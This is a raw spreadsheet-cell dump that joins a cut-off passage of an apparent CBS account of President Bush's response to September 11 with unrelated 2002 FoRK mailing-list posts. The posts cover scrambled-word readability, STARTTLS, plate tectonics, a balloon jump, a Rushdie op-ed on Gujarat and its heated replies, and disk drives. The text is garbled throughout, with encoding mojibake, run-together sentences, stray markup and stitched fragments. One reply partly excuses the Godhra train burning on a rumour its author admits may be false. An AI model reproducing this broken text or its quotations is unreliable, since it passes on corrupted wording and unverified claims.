FleischerFleischerâ€™s notes capture Mr. Bushâ€™s language, plain and unguarded. To 
the vice president he said: â€œWeâ€™re at war, Dick, weâ€™re going to find out 
who did this and kick their ass.â€ Another time, Mr. Bush said, â€œWeâ€™re 
not going to have any slap-on-the-wrist crap this time.â€The President adds, â€œI can remember telling the Secretary of Defense, I 
said, â€˜Weâ€™re going to find out who did this and then Mr. Secretary, you 
and Dick Myers,â€™ who we just named as chairman of the joint chiefs, â€˜are 
going to go get them.â€™â€By 3 p.m., Air Force One touched down at Offutt Air Force Base in 
Nebraska. Mr. Bush and his team were herded into a small brick hut that 
gave no hint of what they would find below.At the bottom of the stairs was the U.S. Strategic Command Underground 
Command Center. It was built to transmit a presidentâ€™s order to go to 
nuclear war. But when Mr. Bush walked in, the battle staff was watching 
the skies over the United States. Many airplanes had still not landed. 
After a short briefing, Mr. Bush and Card were taken to a teleconference 
center which connected them to the White House, the Pentagon, the FBI 
and the CIA. Mr. Bush had a question for his CIA Director George Tenent.According to Rice, Bush asked Tenent who had done this. Rice recalls 
that Tenent answered: â€œSir, I believe its al Qaeda. Weâ€™re doing the 
assessment but it looks like, it feels like, it smells like al Qaeda.â€The evidence would build. FBI Director Robert Mueller says that an 
essential clue came from one of the hijacked planes before it crashed.A flight attendant on American Flight 11, Amy Sweeney, had the presence 
of mind to call her office as the plane was hijacked and give them the 
seat numbers of the hijackers. â€œThat was the first piece of hard 
evidence. We could then go to the manifest, find out who was sitting in 
those seats and immediately conduct an investigation of those 
individuals, as opposed to taking all the passengers on the plane and 
going through a process of elimination,â€ says Mueller.In Nebraska, the White House staff was preparing for an address to the 
nation from the Air Force bunker, but by then the president had had 
enough. He decided to come back.â€œAt one point, he said he didnâ€™t want any tinhorn terrorist keeping him 
out of Washington,â€ Fleischer says. â€œThat verbatim.â€On board, he was already thinking of issuing an ultimatum to the world: 
â€œI had time to think and a couple of thoughts emerged. One was that 
you're guilty if you harbor a terrorist, because I knew these terrorists 
like al-Qaeda liked to prey on weak government and weak people. The 
other thought that came was the opportunity to fashion a vast coalition 
of countries that would either be with us or with the terrorists.â€As Air Force One sped east, the last casualty of the attack on America 
collapsed, one of the nationâ€™s worst days wore into evening. At the 
World Trade Center, 2,801 were killed; at the Pentagon, 184; and in 
Pennsylvania 40. Altogether, there were 3,025 dead.â€œAnybody who would attack America the way they did, anybody who would 
take innocent life the way they did, anybody who's so devious, is evil,â€ 
Bush said recently.Mr. Bush would soon see that evil face to face. After arriving in 
Washington, he boarded his helicopter and flew past the Pentagon on the 
way to the White House.Was there a time when he was afraid that there might not be a White 
House to return to? â€œI donâ€™t remember thinking about whether or not the 
White House would have been obliterated," he recalls. "I think I might 
have thought they took their best shot, and now it was time for us to 
take our best shot.â€Mr. Bush arrived back at the White House nine hours after the attacks. 
His next step was an address to the nation. Karen Hughes and her staff 
were already working on the speech.â€œHe decided that the primary tone he wanted to strike that night was 
reassurance,â€ remembers Hughes. â€œWe had to show resolve, we had to 
reassure people, we had to let them know that we would be OK.â€Just off the Oval Office, Mr. Bush added the words that would become 
known as the Bush Doctrine - no distinction between terrorists and those 
who harbor them. The staff wanted to add a declaration of war but Mr. 
Bush didnâ€™t think the American people wanted to hear it that night and 
he was emphatic about that.He prepared to say it from the same desk where Franklin Roosevelt first 
heard the news of Pearl Harbor. Now Bush was commander in chief. Eighty 
million Americans were watching.â€œToday our fellow citizens, our way of life, our very freedom came under 
attack in a series of deliberate and deadly terrorist acts,â€ he said 
from the Oval Office that night.The Oval Office speech came at the end of the bloodiest day in American 
history since the Civil War. Before he walked to the White House 
residence for the night, Mr. Bush dictated these words for the White 
House daily log: â€œThe Pearl Harbor of the 21st century took place today. 
We think it's Osama bin Laden.â€(CBS)Â When Sept. 12 dawned, President Bush was demanding a war plan. No 
one in the White House or the Pentagon could be sure of what the 
president would do. In office for just eight months, heâ€™d never been 
tested as commander-in-chief.â€œI never asked them what they thought,â€ President Bush said of the 
Pentagon brass, â€œbecause I didnâ€™t really â€“ because I knew what I was 
gonna do. I knew exactly what had to be done, Scott. And that was to set 
a strategy to seek justice. Find out who did it, hunt them down and 
bring them to justice.â€In the cabinet room, the president made clear what was next: â€œThe 
deliberate and deadly attacks which were carried out yesterday against 
our country were more than acts of terror, they were acts of war,â€ he 
said.To the war cabinet, al Qaeda was no surprise. National Security Advisor 
Condoleezza Rice says the administration had been at work on a plan to 
strike bin Ladenâ€™s organization well before Sept. 11.â€œThe president said, â€˜You know Iâ€™m tired of swatting at flies, I need a 
strategy to eliminate these guys,â€™â€ Rice recalls.In one of the worst intelligence failures ever, the CIA and FBI didnâ€™t 
pick up clues that an attack in the United States was imminent. Without 
a sense of urgency, the White House strategy the president had asked for 
came too late.Chief of Staff Andrew Card recalls that the plan Mr. Bush had asked for 
was â€œliterally headed to the presidentâ€™s desk, I think, on the eleventh, 
tenth or eleventh, of September.â€On Sept. 12, the war cabinet was debating the full range of options - 
who to hit and how to hit them. There were some at the Pentagon who 
worried in the early hours that Mr. Bush would order up an immediate 
cruise missile strike, of the kind that had not deterred bin Laden in 
the past.â€œWell, thereâ€™s a lot of nervous Nellies at the Pentagon, anyway,â€ Mr. 
Bush tells Pelley. â€œA lot of people like to chatter, you know, more than 
they should. But no, I appreciate that very much. Secretary of Defense 
(Donald) Rumsfeld early on discussed the idea of making sure we had what 
we called â€˜boots on the ground.â€™ That if youâ€™re gonna go to war, then 
youâ€™ve gotta go to war with all your assets.â€The president says he wanted to â€œfight and win a guerilla war with 
conventional means.â€It was an innovative but risky idea being proposed by CIA Director 
George Tenent. Tenent wanted to combine American technology and 
intelligence with the brute force of Afghan fighters hostile to the 
Taliban government.Secretary of State Colin Powell, noting that the CIA had already 
developed a long relationship with the Afghan resistance, called it an 
unconventional solution to an unconventional problem.â€œAs I like to describe it to my friends,â€ Powell says, â€œwe had on the 
ground a Fourth World army riding horses and living in tents with some 
CIA and special forces with them and we had a First World air force, the 
best in the world. How do you connect it all?â€The president gave them 48 hours to figure it out.Meanwhile, Mr. Bush went to the battlefield himself. Just the day 
before, he had called the Pentagon the â€œmightiest building in the 
world.â€ Now one-fifth of it was in ruins. The wreckage of American 
Flight 77 was being examined by Navy investigators. And before Mr. Bush 
left, he made a point of speaking personally with the team recovering 
the remains of the first casualties of war on his watch.
The next day, Sept. 13, there was another warning of attack that the 
public never heard about. Threats had been were coming in constantly but 
this one sounded credible: a large truck bomb headed to the White House. 
The Secret Service wanted the president back in the bunker.â€œHe wasnâ€™t real receptive to that, to that recommendation,â€ remembers 
Brian Stafford, director of the Secret Service. â€œAnd he ordered a 
hamburger and said he was going to stay in the White House that evening 
and thatâ€™s what he did.â€The next day, would be one of the longest and the most difficult for the 
president. On Friday, Sept. 14, Mr. Bush started the day with a cabinet 
meeting, but he wept when he walked in and was surprised by applause.â€œHe sat down, slightly overcome, for a moment but he recaptured it,â€ 
says Powell who remembers being worried that the president might have 
trouble getting through his speech at the national memorial service 
later that morning.â€œAnd I just scribbled a little note to him,â€ Powell recalls, â€œand I 
said, â€˜Mr. President, Iâ€™ve learned over the years when you are going to 
give a very emotional speech, watch out for certain words that will 
cause you to start to tear up.â€™ He looked at me and he smiled and then 
at the next break in the conversation he said, â€˜The Secretary of State 
told me not to break down at the memorial service,â€™ and that broke the 
tension and everybody started laughing and I felt embarrassed.â€First Lady Laura Bush was involved in planning the memorial service and 
she says she wanted it to be both dignified and comforting. â€œI wanted 
the Psalms and everything to be read to be comforting, because I think 
we were a country, that needed, everyone of us, needed comforting.â€It also stirred the mournersâ€™ resolve, as Rice remember. â€œAs we stood to 
sing the Battle Hymn of the Republic,â€ she says, â€œyou could feel the 
entire congregation and I could certainly feel myself stiffen, the kind 
of spine, and this deep sadness was being replaced by resolve.â€œWe all felt that we still had mourning to do for our countrymen who had 
been lost but that we also had a new purpose in not just avenging what 
had happened to them but making certain that the world was eventually 
going to be safe from this kind of attack ever again.â€Next came a visit to ground zero. The president was not prepared for 
what he encountered there.â€œYou couldnâ€™t brief me, you couldnâ€™t brief anybody on ground zero until 
you saw it," Mr. Bush says. â€œIt was like â€“ it was ghostly. Like youâ€™re 
having a bad dream and youâ€™re walking through the dream.â€The president found the scene very powerful, particularly when the men 
and women at ground zero began to chant, â€œUSA! USA!.â€â€œThere was a lot of bloodlust,â€ the president recalls. â€œPeople were, you 
know, pointing their big old hands at me saying, â€˜Donâ€™t you ever forget 
this, Mr. President. Donâ€™t let us down.â€™ The scene was very powerful. 
Very powerful.â€When Mr. Bush tried to speak, the crowd kept shouting, â€œWe canâ€™t hear 
you.â€The president responded, â€œI can hear you. I can hear you. The rest of 
the world hears you. And the people who knocked these buildings down 
will hear all of us soon.â€Mr. Bush had been in New York just a few weeks before; heâ€™d posed with 
the firemen who always stood by whenever the presidentâ€™s helicopter 
landed there. Now, five of the men who stood with the president in the 
picture were dead â€“ lost at ground zero.When the president arrived Sept. 14, Manhattan was papered with the 
faces of the lost. Families, unable to believe that so many had vanished 
in an instant, held onto the hope that their loved ones were just 
missing. It was a place where a child comforted a grieving mother.At a meeting the public never saw, the president spoke with several 
hundred of these families in a convention hall.â€œPeople said to me, â€˜Heâ€™ll come out. Donâ€™t worry, Mr. president, weâ€™ll 
see him soon. I know my loved one, he will - heâ€™ll find a place to 
survive underneath the rubble and weâ€™ll get him out.â€™ I, on the other 
hand had been briefed about the realities, and my job was to hug and 
cry, but I remember the whole time thinking, â€˜This is incredibly sad 
because the loved ones wonâ€™t come out.â€™â€One little boy handed the president a picture of his father in his 
firefighter uniform and as he signed it, Mr. Bush remembers, he told the 
boy, â€œYour daddy wonâ€™t believe that I was here, so you show him that 
autograph.â€It was an effort â€œto provide a little hope,â€ the president recalls. â€œI 
still get emotional thinking about it because weâ€™re dealing with people 
who loved their dads or loved their mom, or loved theirâ€¦wives who loved 
their husbands. It was a tough time, you know, it was a tough time for 
all of us because we were a very emotional, and I was emotional at 
times. I felt, I felt the same now as I did then, which is sad. And I 
still feel sad for those who grieve for their families, but through my 
tears, I see opportunity.â€The president was supposed to be with the families for about 30 minutes; 
he stayed for two and a half hours. It was there he met Arlene Howard. 
The body of her son, George, was among the first to be found at ground 
zero.â€œI called the police department,â€ Howard remembers, â€œ and they said he 
hadnâ€™t called in for roll call and to call back in an hour and I said, 
â€˜No, I donâ€™t need to call back.â€™ If he hadnâ€™t called in, I knew where he 
was.â€George Howard had rescued children trapped in an elevator back in 1993 
when the World Trade Center was bombed. He had been off duty that day, 
and he was off duty on Sept. 11, but couldnâ€™t stay away. The police 
department gave his badge to his mother and she gave it to the president.â€œHe (the president) he leaned over to talk to me,â€ Howard recalls. â€œAnd 
he extends his sympathy to me and thatâ€™s when I asked him Iâ€™d like to 
present Georgeâ€™s shield to him in honor of all the men and women who 
were killed over there.â€By the end of that day, Mr. Bush flew to Camp David visibly drained.â€œHe was physically exhausted, he was mentally exhausted, he was 
emotionally exhausted, he was spiritually exhausted,â€ recalls Card..The next day â€“ Saturday, Sept. 15 - Mr. Bush met members of his war 
cabinet at the presidential retreat for a last decisive meeting.â€œMy message is for everybody who wears the uniform â€“ get ready. The 
United States will do what it takes,â€ Mr. Bush told them.As Powell remembers it, â€œHe was encouraging us to think boldly. He was 
listening to all ideas; he was not constrained to any one idea; he 
wanted to hear his advisors talk and argue and debate with each other.â€President Bush was pleased with the progress that had been made. â€œOn the 
other hand,â€ he says, â€œI wanted to clarify plans and I went around the 
room and I asked everybody what they thought ought to happen.â€When he left that meeting on Saturday night, he still had not told the 
cabinet what he was planning.â€œI wanted to just think it through,â€ Mr. Bush remembers. â€œAny ti</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; (and no it wasnt me even though the spellingis
&gt; oddly familar)Not that this is news to FoRKs, but:&gt; ... randomising letters in the middle of words [has] little or no
&gt; effect on the ability of skilled readers to understand the text. This
&gt; is easy to denmtrasote. In a pubiltacion of New Scnieitst you could
&gt; ramdinose all the letetrs, keipeng the first two and last two the same,
&gt; and reibadailty would hadrly be aftcfeed. My ansaylis did not come
&gt; to much beucase the thoery at the time was for shape and senqeuce
&gt; retigcionon.  Saberi's work sugsegts we may have some pofrweul palrlael
&gt; prsooscers at work. The resaon for this is suerly that idnetiyfing
&gt; coentnt by paarllel prseocsing speeds up regnicoiton. We only need
&gt; the first and last two letetrs to spot chganes in meniang.-Dave
</t>
  </si>
  <si>
    <t xml:space="preserve">Dave Long writes:
&gt; &gt; (and no it wasnt me even though the spellingis
&gt; &gt; oddly familar)
&gt; 
&gt; Not that this is news to FoRKs, but:
&gt; 
&gt;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meniang.Hmm, there's probably a patentable input-method for 
touch-tone keypads in there somewhere.- Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-09-12 at 12:22, Dave Long wrote:
&gt;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I'm working with an experimental text recognition/processing engine that
exhibits similar characteristics.  It can read right through
misspellings like the above without any difficulty.  And as the author
above suggested, the pattern matching is inherently parallel internally.If the text recognition algorithm/architecture humans use is anything
like the algorithm/structure we've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Cheers,-James Rogers
 jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
So much for carnivore ;)-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t>On 12 Sep 2002, Gary Lawrence Murphy wrote:--]
--]So much for carnivore ;)Yep, that ws the plan all alng with my typos, I am the only one to be
consistently fighting the evls of da vore.</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 12 Sep 2002, Tom wrote:&gt; Yep, that ws the plan all alng with my typos, I am the only one to be
&gt; consistently fighting the evls of da vore.Well, yeah, but there's an easier way.
	http://www.google.com/search?hl=en&amp;lr=&amp;ie=UTF-8&amp;oe=UTF-8&amp;q=STARTTLS&amp;spell=1There's still MITM, but it requires a far higher capability, and is easier
to detect once you go beyond the scamed interaction of two parties, since
being manipulative in principle.If you run your own mailserver, or have a say in what your host does, make 
him adopt STARTTLS.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; If the text recognition algorithm/architecture humans use is anything
&gt; like the algorithm/structure we've been working with, the reason the
&gt; first letter (and to a lesser extent, the last letter) is important is
&gt; that without it the text pattern recognition problem is exponentially
&gt; more difficult (from a theoretical standpoint anyway) and has to be
&gt; resolved using deeper abstraction analysis.  The middle letters are far
&gt; less important and computationally much easier to resolve correctly.I think keeping the number of middle letters consistent with the correct
spelling is important.  Would be interesting to see if this same effect is
applicable to written forms of other languages, maybe even Japanese romongi.Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">When we were discussing Kuhn, I wrote:
&gt; My understanding of the history of
&gt; plate tectonics is that the magnetic
&gt; reversal patterns encoded in seafloor
&gt; basalts were crucial supporting data
&gt; which suddenly became available only
&gt; after Navy declassification, so the
&gt; adoption curve may be skewed.Many of the essays in Oreskes' _Plate
Tectonics_ seem to support this idea:Sandwell, "Plate Tectonics: A Martian View"
&gt; In this essay, I'll describe a few of the important confirmations of
&gt; plate tectonic theory provided by satellites and ships.  These tools
&gt; were largely developed to support the Cold War effort, and many are
&gt; labeled geodetic since they are used to make precise measurements
&gt; of the size and shape of the earth and the spatial variations in the
&gt; pull of gravity.  The tools of satellite geodesy are needed for all
&gt; aspects of global warfare; precise satellite tracking and gravity
&gt; field development are needed for precision satellite surveillance
&gt; as well as for targeting ballistic missiles; the global positioning
&gt; system is used in all aspects of modern warfare; radar altimetery is
&gt; used or aiming submarine-launched ballistic missiles as well as for
&gt; inertial navigation when submerged.
&gt; 
&gt; The global seismic networks were developed, primarily, to monitor
&gt; underground nuclear tests.  Marine magnetometers were developed,
&gt; primarily, for detection of submarines.  Multibeam sea floor mapping
&gt; systems were developed, primarily, for surveying critical and
&gt; operational areas of the northern oceans.... and the Navy was in no hurry
to declassify any of these data,
as any uneven coverage could have
revealed the parts of the oceans
they found most interesting.-Dave(What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
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I think keeping the number of middle letters consistent with the correct
&gt; spelling is important.Aeftr tinryg it out on my lacol daciinorty,
the worst I cloud find were teilprs, and of
tehm the most cfinnosug seeemd to be:	parental paternal prenatal as cenotxt wloud be mcuh more sacfgiiinnt
with the rest, scuh as:	bakers beakers breaks98% of the 45k wdors were uinque.-Dave1. romaji, or european languages which
tend to end in vowels, would presumably
work better with attention on the ending
syllable (or at least consonant sound)2. are typos a larger or smaller space?
I had a whoromatic proggy that scattered
transpositions at hazard where the hands
alternated quickly; that would be a much
smaller space -- but transposing/eliding
spaces might make for a much larger one.
</t>
  </si>
  <si>
    <t xml:space="preserve">The USAF had a program in the 1959-1960 in which successful free jumps 
were made from balloons at up to ~32 km (100,000 ft.). The relevance was 
astronauts and SR-71 bailouts. This would top that achievement 
comfortably.http://www.wpafb.af.mil/museum/history/postwwii/pe.htmChuckOn Monday, September 9, 2002, at 11:20 AM, Owen Byrne wrote:&gt; John Hall wrote:
&gt;
&gt;&gt; Why so fast?  Normal terminal velocity is much slower.
&gt;&gt;
&gt; Not at 40,000 m. I found this article 
&gt; (http://www.wired.com/news/print/0,1294,53928,00.html) :
&gt;
&gt; "The last person to try to break the highest free fall record died in 
&gt; the attempt. In 1965, New Jersey truck driver Nick Piantanida suffered 
&gt; catastrophic equipment failure when his facemask blew out at 57,000 
&gt; feet. Lack of oxygen caused such severe brain damage that he went into 
&gt; a coma and died four months later."
&gt;
&gt; And in amongst the flash at
&gt; http://www.legrandsaut.org/site_en/
&gt;
&gt; you can discover that he will break the sound barrier at 35,000 m,
&gt; presumably reaching top speed somewhere above 30,000.
&gt;
&gt; Owen
&gt;
&gt;&gt;
&gt;&gt;&gt; -----Original Message-----
&gt;&gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
&gt;&gt;&gt; bitbitch@magnesium.net
&gt;&gt;&gt; Sent: Sunday, September 08, 2002 8:36 AM
&gt;&gt;&gt; To: (Robert Harley)
&gt;&gt;&gt; Cc: fork@spamassassin.taint.org
&gt;&gt;&gt; Subject: Re: The Big Jump
&gt;&gt;&gt;
&gt;&gt;&gt;
&gt;&gt;&gt;
&gt;&gt;&gt; So uh, would this qualify for the Darwin awards if he doesn't make it?
&gt;&gt;&gt;
&gt;&gt;&gt; Freaking french people...
&gt;&gt;&gt;   :-)
&gt;&gt;&gt; -BB
&gt;&gt;&gt; RH&gt; Today a French officer called Michel Fournier is supposed to get
&gt;&gt;&gt;
&gt;&gt; in a
&gt;&gt;
&gt;&gt;&gt; RH&gt; 350-metre tall helium balloon, ride it up to the edge of space (40
&gt;&gt;&gt;
&gt;&gt; km
&gt;&gt;
&gt;&gt;&gt; RH&gt; altitude) and jump out.  His fall should last 6.5 minutes and
&gt;&gt;&gt;
&gt;&gt; reach
&gt;&gt;
&gt;&gt;&gt; RH&gt; speeds of Mach 1.5.  He hopes to open his parachute manually at
&gt;&gt;&gt;
&gt;&gt; the
&gt;&gt;
&gt;&gt;&gt; RH&gt; end, although with an automatic backup if he is 7 seconds from the
&gt;&gt;&gt; RH&gt; ground and still hasn't opened it.
&gt;&gt;&gt;
&gt;&gt;&gt; RH&gt; R
&gt;&gt;&gt;
&gt;&gt;&gt; RH&gt; ObQuote:
&gt;&gt;&gt; RH&gt;   "VederÃ², si averÃ² si grossi li coglioni, come ha il re di
&gt;&gt;&gt;
&gt;&gt; Franza."
&gt;&gt;
&gt;&gt;&gt; RH&gt;   ("Let's see if I've got as much balls as the King of France!")
&gt;&gt;&gt; RH&gt;   - Pope Julius II, 2 January 1511
&gt;&gt;&gt;
&gt;&gt;&gt;
&gt;&gt;&gt;
&gt;&gt;&gt; --
&gt;&gt;&gt; Best regards,
&gt;&gt;&gt; bitbitch                            mailto:bitbitch@magnesium.net
&gt;&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;
&gt;
&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">As I've had to resubscribe to fork and fork-noarchive,
I guess I have to reintroduce myself.  I'm formerly
known as gbolcer at endtech dot com to the FoRK
mailman program, formerly an overposter, and love
soaking up bits through avid reading or scanning
of almost every single list that's got informative to say. Hopefully all those overpost will get cleared out at
somepoint and fork-archived.   Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">An old Indian friend forwarded this to me a while ago.http://www.washingtonpost.com/ac2/wp-dyn?pagename=article&amp;node=&amp;contentId=A58173-2002Mar7&amp;notFound=trueSlaughter in the Name of God
By Salman Rushdie
Friday, March 8, 2002; Page A33 Washington PostThe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Their murderous attack on the 
train-load of VHP activists at Godhra (with its awful, atavistic echoes 
of the killings of Hindus and Muslims by the train-load during the 
partition riots of 1947) played right into the Hindu extremists' hands.The VHP has evidently tired of what it sees as the equivocations and 
insufficient radicalism of India's BJP government. Prime Minister Atal 
Bihari Vajpayee is more moderate than his party; he also heads a 
coalition government and has been obliged to abandon much of the BJP's 
more extreme Hindu nationalist rhetoric to hold the coalition together. 
But it isn't working anymore. In state elections across the country, the 
BJP is being trounced. This may have been the last straw for the VHP 
firebrands. Why put up with the government's betrayal of their fascistic 
agenda when that betrayal doesn't even result in electoral success?The electoral failure of the BJP is thus, in all probability, the spark 
that lit the fire. The VHP is determined to build a Hindu temple on the 
site of the demolished Ayodhya mosque -- that's where the Godhra dead 
were coming from -- and there are, reprehensibly, idiotically, 
tragically, Muslims in India equally determined to resist them. Vajpayee 
has insisted that the slow Indian courts must decide the rights and 
wrongs of the Ayodhya issue. The VHP is no longer prepared to wait.The distinguished Indian writer Mahasveta Devi, in a letter to India's 
president, K. R. Narayanan, blames the Gujarat government (led by a BJP 
hard-liner) as well as the central government for doing "too little too 
late." She pins the blame firmly on the "motivated, well-planned out and 
provocative actions" of the Hindu nationalists. But another writer, the 
Nobel laureate V. S. Naipaul, speaking in India just a week before the 
violence erupted, denounced India's Muslims en masse and praised the 
nationalist movement.The murderers of Godhra must indeed be denounced, and Mahasveta Devi in 
her letter demands "stern legal action" against them. But the VHP is 
determined to destroy that secular democracy in which India takes such 
public pride and which it does so little to protect; and by supporting 
them, Naipaul makes himself a fellow traveler of fascism and disgraces 
the Nobel award.The political discourse matters, and explains a good deal. But there's 
something beneath it, something we don't want to look in the face: 
namely, that in India, as elsewhere in our darkening world, religion is 
the poison in the blood. Where religion intervenes, mere innocence is no 
excuse. Yet we go on skating around this issue, speaking of religion in 
the fashionable language of "respect." What is there to respect in any 
of this, or in any of the crimes now being committed almost daily around 
the world in religion's dreaded name? How well, with what fatal results, 
religion erects totems, and how willing we are to kill for them! And 
when we've done it often enough, the deadening of affect that results 
makes it easier to do it again.So India's problem turns out to be the world's problem. What happened in 
India has happened in God's name. The problem's name is God.Salman Rushdie is a novelist and author of the forthcoming essay 
collection "Step Across This Line."Â© 2002 The Washington Post Company
sdw-- 
sdw@lig.net http://sdw.st
Stephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622
703-724-0118W 703-995-0407Fax Dec2001
</t>
  </si>
  <si>
    <t xml:space="preserve">What I understood was that the activists on the train refused to pay for
the food and other items they acquired from the Muslim vendors -- then
taunted them.That may not be true, but it would put things in a more interesting
light.  Taking food from a small vendor in India and not paying them is
trying to starve them.It sounded consistent with the ideas and purpose of the train full of
activists.I'm rarely an apologist for Muslims anywhere.  Yet I find my sympathies
with the Muslims in this case, even after they burned the train.
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
&gt; Stephen D. Williams&gt; The pity of it is that some
&gt; Muslims were ready to give it to them. Their murderous attack on the
&gt; train-load of VHP activists at Godhra (with its awful, atavistic
echoes
&gt; of the killings of Hindus and Muslims by the train-load during the
&gt; partition riots of 1947) played right into the Hindu extremists'
hands.
</t>
  </si>
  <si>
    <t xml:space="preserve">The usual crud.  Why do morons ranting and beating their chests in the
National Review (or similar rags) merit FoRKing?
</t>
  </si>
  <si>
    <t xml:space="preserve">First, it was my understanding that they had the food before they
refused to pay.  I often have the goods in my possession before I settle
the paycheck.Second, 'not being paid for a little food' is an awfully big deal in
India.  It isn't far from stealing the only food my children have so
I'll have to watch them starve.  The margin of survival is very, very,
thin.So yes.  In my particular reality distortion field 'not paying for a
little food' in India is akin to a direct act of violence intended to
cause suffering if not death on the victims family.  That such an act
triggers a violent response is, IMHO, hardly surprising.In other words, as far as I could tell the people on the train fired the
first shot.With all of that said I still don't know if this happened or not.  Nor
do I know for sure that the margin of survival for those Muslim vendors
was that thin.
&gt; -----Original Message-----
&gt; From: Stephen D. Williams [mailto:swilliams@hpti.com]
&gt; Sent: Monday, September 16, 2002 11:54 AM
&gt; To: johnhall@evergo.net
&gt; Cc: fork@spamassassin.taint.org; lea@lig.net
&gt; Subject: Re: Slaughter in the Name of God
&gt; 
&gt; Wow!  It seems you are evaluating this with a large reality distortion
&gt; field.
&gt; 
&gt; If the activists on the train refused to pay for food, then the
vendors
&gt; shouldn't give it to them.  And the local police force should be
&gt; arresting them.  Etc.
&gt; 
&gt; You have to be operating from a particularly primitive point of view,
&gt; which obviously was in operation with the participants here, to think
&gt; that religious differences or not being paid for a little food (or
&gt; taunting!) was even a remote justification for burning a train full of
&gt; people alive.
&gt; 
&gt; sdw
&gt; 
&gt; John Hall wrote:
&gt; &gt; What I understood was that the activists on the train refused to pay
for
&gt; &gt; the food and other items they acquired from the Muslim vendors --
then
&gt; &gt; taunted them.
&gt; &gt;
&gt; &gt; That may not be true, but it would put things in a more interesting
&gt; &gt; light.  Taking food from a small vendor in India and not paying them
is
&gt; &gt; trying to starve them.
&gt; &gt;
&gt; &gt; It sounded consistent with the ideas and purpose of the train full
of
&gt; &gt; activists.
&gt; &gt;
&gt; &gt; I'm rarely an apologist for Muslims anywhere.  Yet I find my
sympathies
&gt; &gt; with the Muslims in this case, even after they burned the train.
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;&gt;From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
&gt; &gt;&gt;Stephen D. Williams
&gt; &gt;
&gt; &gt;
&gt; &gt;&gt;The pity of it is that some
&gt; &gt;&gt;Muslims were ready to give it to them. Their murderous attack on the
&gt; &gt;&gt;train-load of VHP activists at Godhra (with its awful, atavistic
&gt; &gt;
&gt; &gt; echoes
&gt; &gt;
&gt; &gt;&gt;of the killings of Hindus and Muslims by the train-load during the
&gt; &gt;&gt;partition riots of 1947) played right into the Hindu extremists'
&gt; &gt;
&gt; &gt; hands.
&gt; 
&gt; sdw
&gt; --
&gt; swilliams@hpti.com http://www.hpti.com
&gt; Stephen D. Williams, Senior Technical Director
&gt; 
&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 16 Sep 2002, Stephen D. Williams wrote:&gt; It's efficient-end, not low end.  At 1Million hour MTBF, 133MB/sec,
&gt; and pretty good buffering and speed, the only thing going for SCSI is
&gt; 15,000 RPM vs. 7200 and in a very small number of cases, slightly
&gt; better scatter-gather.  (Actually, I think there might be a 15,000 RPM
&gt; IDE now.)It's not just krpm, the desktop HDs have a higher failure rate. But I
agree, EIDE has high density, and EIDE hardware RAID can offer SCSI a
sound beating for reliability, performance, and storage density/rack units
for the money, if designed for it, and if people would actually start 
buying it.
&gt; The other issues are pretty much non-issues: using multiple drives and
&gt; controller contention (just use many IDE channels with extra PCI
&gt; cards, up to 10 in some systems), and long cable runs (just splitThere are not all that many hard drives inside an 1U enclosure. Airflow
blockage (you have to fit in 2-3x the number of SCSI disks with EIDE) will
soon be a thing of the past due to SATA.&gt; storage between nodes).  Dual-port SCSI is also a non-issue since it
&gt; is very expensive, doesn't work that well in practice because there
&gt; are numerous secondary failure modes for shared disk systems, and
&gt; because you still end up with a single point of failure.Since rack-space costs dominate, and our systems need more or less decent
I/O we're going with 1U Dells with SCSI. The hard drive prices don't
really make a visible difference, given the cost of the iron, and the
rackspace/month. Plus, 1U Dells don't have any space left for lots of EIDE
drives.
</t>
  </si>
  <si>
    <t>the doctor wears many hats, including but not limited to a rubber skullcap
for playing water polo, a beret for making sparkling wines, and an oversized
fedora to deflect his own cigar smoke, which he regularly blows up my ...
geege-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Jim
Whitehead
Sent: Monday, September 16, 2002 2:08 PM
To: FoRK
Subject: RE: introductions
&gt; Aren't you Dr. Gregory A. Bolcer, Dutch Uncle of P2P?I thought he was Greg Bolcer, recovering XPilot &amp; Doom junkie...- Jim</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: Stephen D. Williams [mailto:swilliams@hpti.com]&gt; 
&gt; Just to further weaken the food transaction argument, I'll note that
in
&gt; my neighborhood, the local McDonalds won't even hand you your drink in
&gt; the drive through until you fork over the cash.  
Maybe you never bought a hot dog from a street vendor.&gt; And why is it that the margin of survival is so thin?  Could it be
that
&gt; all of these tribal rivalries are part of what's holding back
wholesale
&gt; movement to the modern, first world patterns of constructive thinking?Well, yes.  But it doesn't change the idea that the margin of survival
probably IS that thin in this region.&gt; I'm sure that both sides were ready to be the agressor.  I'm not.  I'm sure both sides were equally ready to be the aggressor
provided they were in a predominant position of power.&gt; Bush's reluctance to blast blind obeyance of religion as taught by
your
&gt; local madrassa or KKK leader, apparently because he is fully involved
&gt; with the general effort to expand unfettered religiosity as the
solution
&gt; to the world's ills, is disappointing.  He has spoke against madrassa,
&gt; but what I heard sounded lame and carefully crafted to shield religion
&gt; in general from scrutiny.1. Which religion and how it is currently being expressed matters.
2. The US is trying to avoid making war on the Muslim religion.
3. US Leadership remains reflexively multi-cultural.&gt; We all have
&gt; disagreements, but at some point it becomes a crime against humanity.I didn't say burning the train was a good thing.  I said I understood it
wasn't a spontaneous attack on people who had done no wrong.
</t>
  </si>
  <si>
